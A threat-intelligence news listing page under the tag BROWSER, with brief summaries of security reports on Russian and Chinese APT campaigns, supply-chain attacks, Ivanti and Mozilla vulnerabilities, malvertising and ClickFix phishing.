Tag: BROWSER

Frequent freeloader part II: Russian actor Secret Blizzard using tools of other groups to attack Ukraine | Microsoft Security Blog
Microsoft Threat Intelligence has reported on the Russian nation-state actor Secret Blizzard, which has been using co-opted tools and infrastructure from other threat actors to conduct espionage activities against targets in Ukraine. The campaigns have involved the deployment of custom malware, including the Tavdig and KazuarV2 backdoors, often facilitated through cybercriminal tools like Amadey bot malware.…
Read More
“Scam Yourself” Attacks Show How Social Engineering is Evolving
Summary: The emergence of “scam yourself” attacks represents a sophisticated evolution of social engineering, where attackers manipulate users into compromising their own security. These attacks exploit routine actions, authority, and urgency, making them particularly dangerous as they blend seamlessly into everyday digital interactions. Understanding the psychological triggers behind these scams is essential for developing effective defenses against them.…
Read More
Four Critical Ivanti CSA Vulnerabilities Exploited, CISA and FBI Urge Mitigation
The Cybersecurity and Infrastructure Security Agency (CISA) and the FBI have issued a joint advisory regarding the active exploitation of four critical vulnerabilities in Ivanti Cloud Service Appliances. These include CVE-2024-8963, CVE-2024-9379, CVE-2024-8190, and CVE-2024-9380, which can lead to unauthorized access, remote code execution, and credential theft.…
Read More
PlushDaemon compromises supply chain of Korean VPN service
ESET researchers have uncovered a previously undisclosed APT group, PlushDaemon, linked to China, which executed a supply-chain attack on a South Korean VPN developer in 2023. The attackers replaced the legitimate VPN installer with a malicious version that deployed a sophisticated backdoor known as SlowStepper. This backdoor features a comprehensive toolkit with over 30 components, allowing extensive cyber espionage capabilities.…
Read More
Summary: Microsoft has announced that Windows 11 24H2 has entered the broad deployment phase, making it available to all eligible devices via Windows Update. The update is being rolled out to PCs running Windows 10 22H2 and includes a phased approach for eligible devices. Users can check for the update through their device settings and can pause the installation if needed.…
Read More
Discover Hidden Browsing Threats: Free Risk Assessment for GenAI, Identity, Web, and SaaS Risks
Summary: The rise of GenAI tools and SaaS platforms has significantly increased risks related to data exposure and identity vulnerabilities in the workplace. A new complimentary risk assessment is available to help organizations evaluate their specific browsing environment and identify key risks. This assessment provides actionable insights to enhance security posture and inform decision-making for security and IT teams.…
Read More
Targeted supply chain attack against Chrome browser extensions
This article discusses a supply chain attack on Chrome browser extensions that began in December 2024, where attackers exploited a phishing vulnerability to inject malicious code. This breach compromised a number of extensions, risking sensitive user data including authentication tokens. Investigations revealed the attackers’ sophisticated methods and infrastructure, highlighting the ongoing threats posed by such supply chain vulnerabilities.…
Read More
PlushDaemon APT Targets South Korean VPN Provider in Supply Chain Attack
Summary: A newly identified China-aligned advanced persistent threat (APT) group named PlushDaemon has been linked to a supply chain attack on a South Korean VPN provider, utilizing a sophisticated backdoor known as SlowStepper. This backdoor features a comprehensive toolkit designed for espionage and data collection, indicating the group’s significant operational capabilities since at least 2019.…
Read More
Supercharge Your CTI: AI-Powered IOC Collection with ChatGPT, Inoreader and Google Drive
This article outlines a proof-of-concept for automating the collection and processing of Indicators of Compromise (IOCs) using Inoreader, Google Drive, and OpenAI’s GPT-4. The workflow aims to enhance the efficiency of Cyber Threat Intelligence (CTI), Incident Response (IR), and Security Operations Center (SOC) teams by transforming raw data into actionable insights.…
Read More
Critical Mozilla Vulnerabilities Prompt Urgent Updates for Firefox and Thunderbird Users
Mozilla Firefox and Thunderbird users are facing critical vulnerabilities that could result in arbitrary code execution and system instability. The Indian Computer Emergency Response Team (CERT-In) has issued an advisory urging immediate software updates to mitigate these risks. Affected: Mozilla Firefox, Mozilla Thunderbird

Keypoints :

High-severity vulnerabilities found in Mozilla Firefox and Thunderbird.…
Read More
Microsoft previews Game Assist in-game browser in Edge Stable
Summary: Microsoft has launched Game Assist, a new in-game browser feature for Edge Stable users, designed to enhance the gaming experience by providing tips and guides while playing. This overlay can be accessed through the Game Bar and is optimized for various popular games. The feature is now available without needing to switch from the default Edge browser, making it more accessible for gamers.…
Read More
Fake Homebrew Google ads target Mac users with malware
Summary: Hackers are exploiting Google ads to distribute malware through a counterfeit Homebrew website, targeting Mac and Linux users with an infostealer known as AmosStealer. This malware is designed to extract sensitive information, including credentials and cryptocurrency wallets. Security experts warn users to be cautious of sponsored ads and to verify the legitimacy of websites before downloading software.…
Read More
Sophos MDR tracks two ransomware campaigns using “email bombing,” Microsoft Teams “vishing”
Sophos X-Ops’ Managed Detection and Response (MDR) has reported on two active threat clusters, STAC5143 and STAC5777, utilizing Microsoft Office 365 to infiltrate organizations for data theft and ransomware deployment. The tactics include email-bombing, fake tech support, and exploiting remote control tools. Both clusters exhibit overlapping techniques with known threat groups like FIN7 and Storm-1811.…
Read More
InvisibleFerret Malware: Technical Analysis
The article discusses the emergence of InvisibleFerret malware, which is being spread through fake job interviews targeting developers in the tech and cryptocurrency sectors. This malware is part of a broader campaign that includes other malware like BeaverTail. InvisibleFerret is designed to steal sensitive information and operates silently, making it difficult to detect.…
Read More
Analysis Report on the Latest Phishing Incident by Clickfix: The Tragedy of CAPTCHA Resistance – Security Cow
This article analyzes the Clickfix phishing incidents, highlighting the evolution of CAPTCHA bypass techniques and the exploitation of user trust in verification mechanisms. It details how attackers use social engineering to manipulate users into executing malicious commands, leading to data theft. Affected: Windows system users, WordPress websites, online security sector

Keypoints :

Clickfix is a phishing technique that exploits user fatigue with verification processes.…
Read More
Star Blizzard hackers abuse WhatsApp to target high-value diplomats
Summary: Russian nation-state actor Star Blizzard has initiated a spear-phishing campaign targeting WhatsApp accounts of individuals in government, diplomacy, and organizations related to Ukraine aid. This campaign marks a tactical shift following the exposure of their previous methods, utilizing social engineering techniques to compromise accounts without malware.…
Read More